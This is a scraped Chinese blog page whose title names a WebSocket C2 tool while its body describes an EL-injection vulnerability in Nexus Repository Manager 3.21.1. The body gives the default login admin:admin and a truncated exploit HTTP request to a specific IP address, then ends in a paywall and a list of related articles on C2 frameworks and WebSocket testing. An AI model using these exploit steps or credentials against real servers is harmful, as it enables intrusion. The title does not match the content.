渗透测试工具_WebSocket C2 一款后渗透测试工具

最新推荐文章于 2025-03-28 09:16:23 发布
最新推荐文章于 2025-03-28 09:16:23 发布
阅读量848 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: 渗透测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_39839410/article/details/111382917
本文介绍了Nexus Repository Manager 3.21.1及以前版本存在的任意EL表达式注入漏洞,该漏洞允许普通用户通过执行特定数据包触发EL表达式。修复版本为3.21.2。文中详细展示了利用漏洞的方法,并提供了一个命令执行的例子,同时提到了DNSLog作为漏洞验证的一种手段。此外,还推荐了三篇关于渗透测试工具的文章。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

b280d6a99050a48bb07639348972c1db.gif

Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。影响范围:3.21.1

http://download.sonatype.com/nexus/3/nexus-3.21.1-01-unix.tar.gz

修复版本:3.21.2

http://download.sonatype.com/nexus/3/nexus-3.21.2-03-unix.tar.gz

该漏洞需要至少普通用户身份,所以我们需要使用账号密码admin:admin登录后台。
登录后,复制当前Cookie和CSRF Token,发送如下数据包,即可执行EL表达式:

  1. POST /service/rest/beta/repositories/go/group HTTP/1.1

  2. Host: 188.40.189.134:8081

  3. Content-Length: 203

  4. X-Requested-With: XMLHttpRequest

  5. X-Nexus-UI: true

  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) G

最低0.47元/天 解锁文章

200万优质内容无限畅学
Web安全测试渗透工具环境合集(附安装包与虚拟机环境)
悦分享
11-05 761
虚拟机环境截图: 目前主流的工具分为四大类:1. 常见信息收集类工具Nmap:NMap是Network Mapper的缩写。它是一个免费和开源的安全检查工具,用于网络调查和安全评估,如检查开放的端口、监督管理检修时间表、观察主机或管理的正常运行时间。它支持Linux、Windows、Mac OS、AmigaOS等,可用于弄清组织上有哪些主机可以使用、正在运行什么工作框架和版本、正在使用什么样的捆绑通道/防火墙等。御剑:是一款用于网站后台的扫描的工具。Google hack:用Google搜索引擎对某些特定的
web渗透--51--WebSockets安全测试
武天旭的博客
09-22 3414
1、WebSockets概述 传统的HTTP协议只允许每个TCP连接一个请求/响应,这是一个半双工的交互模式。HTML5 WebSockets允许客户端/服务器建立一个 “全双工” 通信通道,从而允许客户端和服务器真正实现异步通信。WebSocket通过HTTP进行初始的 “升级” 握手,从那时起,所有通信都通过TCP通道并使用frames。
c语言远控,C&C远控工具:WebSocket C2
weixin_39714849的博客
05-20 723
这篇文章,我们将学习另一款 C&C 远控工具 WebSocket C2,也被称为 WSC2。介绍WSC2 主要是一款渗透测试工具。WSC2 会使用 WebSocket 和一个浏览器进程。它的作用是在目标靶机上运行的客户端和实际充当 C2 服务器的控制器之间作为 C2 通信通道。这款工具使用 Python 开发的。本文演示环境·攻击机:kali Linux·靶机:Windows 10安装首...
Websocket长连接接口渗透测试过程随记
Python_0011的博客
03-14 1650
但是使用插件多次连接WS接口发现都是403,研究了一番后发现,目标会检测Origin头,如果不是自己站点,就直接返回403,因此需要用Burp来修改请求头。打开bp,找到repeater,新建一个websocket会话,选择刚刚已经建立连接的Websocket会话,并点击下方的Attach。最近接到公司的一个API接口测试的项目,除了常规的HTTP协议的API接口外,其中还有一部分是需要测试Websocket接口的。然而在我寻找了插件的各个角落,也没有发现存在自动回复pong包的功能,很遗憾这种方法失败。
渗透攻击实例-WebSocket攻击
Python_0011的博客
02-07 1669
跨站WebSocket劫持(也称为跨域WebSocket劫持)是一种由于WebSocket握手流程的安全缺陷所导致的跨站点请求伪造(CSRF)漏洞。当WebSocket握手请求仅依靠HTTP cookie进行会话处理并且不包含任何CSRF token或其他不可预测的值时,就会出现这种漏洞。攻击者可以在自己的站点上创建一个恶意网页,从而建立与易受攻击的应用程序的跨站点WebSocket连接。该应用程序将在受害用户与该应用程序的会话的上下文中处理连接。
渗透基础】第七章 WebSocket
人间体佐菲的博客
09-09 862
websocket与http的区别以及特点
WebSocket C2框架:Python-WSC2工具深度解析
利用WebSocket的实时通信特性,一个WebSocket C2工具可以实现实时的、双向的数据交互,这对于某些需要即时命令执行和数据收集的场景非常有用。同时,WebSocket通信通常较少受到防火墙和入侵检测系统的阻碍,因此...
Python-WSC2一个WebSocketC2工具
08-10
Python-WSC2是一个轻量级、易于部署的WebSocket C2框架,专为渗透测试和红队操作设计。它利用WebSocket协议提供了一个隐藏且高效的通信渠道,可以用于执行远程命令、上传和下载文件以及收集目标系统的各种信息。 **...
2024HW面试 中高级面试面经背诵笔记(持续更新)
weixin_51339377的博客
06-09 724
注册表下\HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users下的Names可以看到所有用户 包括影子用户。netstat -ano | findstr "ESTABLISHED" #可以在所有的网络连接中查看进程PID建立的连接。通过netstat定位出pid后 可以用 tasklist | find "3389" 来查看相应pid具体的应用程序。管理员权限用 netstat -anb 快速定位所有的端口对应的应用程序。常见数据库的端口,Vnc的端口等。
BlackMamba:C2渗透框架
weixin_43977912的博客
11-17 1882
BlackMamba BlackMamba是一款多客户端C2/后渗透框架,并且还支持某些网络间谍软件的功能。该工具基于Python 3.8.6和QT框架开发,可以在渗透测试任务中为广大研究人员提供帮助。 BlackMamba的功能如下: 多客户端支持:支持同时连接多个客户端; 实时通信更新:支持客户端和服务器端之间的实时通信和更新; 通信加密:支持对除了屏幕视频流之外的所有通信信息进行加密; 截屏收集:从客户端获取实时截屏; 视频流:实时查看客户端屏幕视频流; 客户端锁定:锁定和解锁客户端设备; 文件传输加
Websocket长连接接口渗透测试过程随记_websockets建立连接 渗透测试(1)
2301_79985178的博客
04-15 596
最近接到公司的一个API接口测试的项目,除了常规的HTTP协议的API接口外,其中还有一部分是需要测试Websocket接口的。回想了一下除了之前复现Jumpserver漏洞时候用过Websocket,以外就没有对它有过什么研究了。这次也算是第一次与它交手,开始测试的时候就不是很顺利,但是好在最后解决了,故在此做下简单的记录。
websocke渗透测试WSSiP: A WebSocket Manipulation Proxy
公众号shadow sock7
12-18 1530
碰到一个websocket的测试,而burp没有很好的支持websocket的repeater功能。 于是找到一个websocket测试工具: WSSiP: A WebSocket Manipulation Proxy https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/may/wssip-a-websoc...
【burpsuite安全练兵场-客户端16】测试WebSockets安全漏洞-3个实验(全)
热门推荐
01-17 1万+
【BP靶场portswigger-客户端16测试WebSockets安全漏洞】3个实验-万文详细步骤
websocket_黑客websocket
weixin_26747751的博客
09-14 307
websocketThe Same-Origin Policy (SOP) is one of the fundamental defences deployed in modern web applications. It restricts how a script from one origin can interact with the resources of a different o...
DeimosC2一款强大的后渗透指挥控制工具
最新发布
gitblog_01059的博客
03-28 726
DeimosC2一款强大的后渗透指挥控制工具 项目介绍 DeimosC2一款处于 Beta 测试阶段的后渗透 Command & Control(C2工具。它通过多种通信方式控制已妥协的机器,支持 Windows、Darwin 和 Linux 操作系统。该项目完全使用 Golang 编写,前端采用 Vue.js。 项目技术分析 DeimosC2 的核心功能是提供一个稳定的后渗透平台...
【Web安全】先进技术WebSocket下安全测试
HBohan的博客
10-21 571
什么是WebSocket WebSockets 是一种先进的技术。它可以在用户的浏览器和服务器之间打开交互式通信会话。允许浏览器和服务器建立单个TCP连接然后进行全双工异步通信。允许实时更新,浏览器也无需向后台发送数百个新的HTTP 请求,所以对于web程序来说,WebSocket非常流行 在一次授权的APP渗透测试中,发现客服系统走的websocket 测试了几个功能,抓到了upload的websocket接口 经过测试 发现存在任意文件上传,且可以通过…/…/控制上传文件夹,文件名也没经过后端处理
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值